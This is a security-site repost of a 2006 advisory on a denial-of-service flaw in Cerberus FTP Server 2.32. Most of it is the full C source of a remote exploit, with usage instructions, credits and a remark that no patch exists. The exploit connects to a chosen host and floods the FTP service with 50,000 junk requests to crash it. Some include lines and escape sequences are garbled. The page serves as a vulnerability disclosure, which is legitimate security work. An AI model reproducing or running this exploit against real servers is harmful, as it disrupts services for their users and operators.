Ads Cerberus FTP Server 2.32 Denial of Service Tuesday, 14 February 2006 Vulnerability: -------------------- Denial of service: A denial-of-service attack (also, DoS attack) is an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services by consuming the bandwidth of the victim network or overloading the computational resources of the victim system. Exploit: -------------------- cerberus_232_dos_remote_xpl.c CODE #include #include #include #include #include #define POCSTR "%s" int header(); int usage(char *filename); int remote_connect( char* ip, unsigned short port ); int header() { printf(" [i] KAPDA - Computer Security Science Researchers Institute "); printf("[i] Title: Cerberus FTP Server <= v2.32 Dos Exploit "); printf("[i] Discovered by: cvh {a] kapda.ir "); printf("[i] Exploit by: Pi3cH {a] kapda.ir "); printf("[i] More info: www.kapda.ir/page-advisory.html "); return 0; } int usage(char *filename) { printf("[i] Usage: %s HOST PORT ",filename); printf("[i] Example: %s 127.0.0.1 21 ",filename); exit(0); } int remote_connect( char* ip, unsigned short port ) { int s; struct sockaddr_in remote_addr; struct hostent* host_addr; memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) { printf ( "[e] Cannot resolve "%s" ", ip ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_port = htons ( port ); remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "[e] Socket failed! " ); exit(1); } if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "[e] Failed connecting! " ); exit(1); } return ( s ); } int main(int argc, char *argv[]) { int s,i; char *request; char junk_data[] = "DoS-JUNK-DATA.:(CVH):.x0dx0a"; header(); if( (argc < 2) ) usage(argv[0]); request = (char *) malloc(1024); printf("[r] Connecting to remote host "); s = remote_connect(argv[1],atoi(argv[2])); sleep(1); printf("[r] Creating buffer "); sprintf(request,POCSTR,junk_data); printf("[r] Sending %d bytes of DOS buffer ",strlen(request)); for(i=0;i<50000;i++) if ( send ( s, request, strlen (request), 0) <= 0 ) { printf("[e] Failed to send buffer "); close(s); exit(1); } sleep(1); printf("[s] Exploit Done! "); close(s); free(request); request = NULL; return 0; } Solution: -------------------- Vendor couldnt care less, so no patch exits. Credit : -------------------- Discoverd by cvh [at} kapda.ir Exploit by pi3ch [at} kapda.ir Grtz to all members of KAPDA and GSO. KAPDA - Computer Security Science Researchers Institute http://www.KAPDA.ir   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.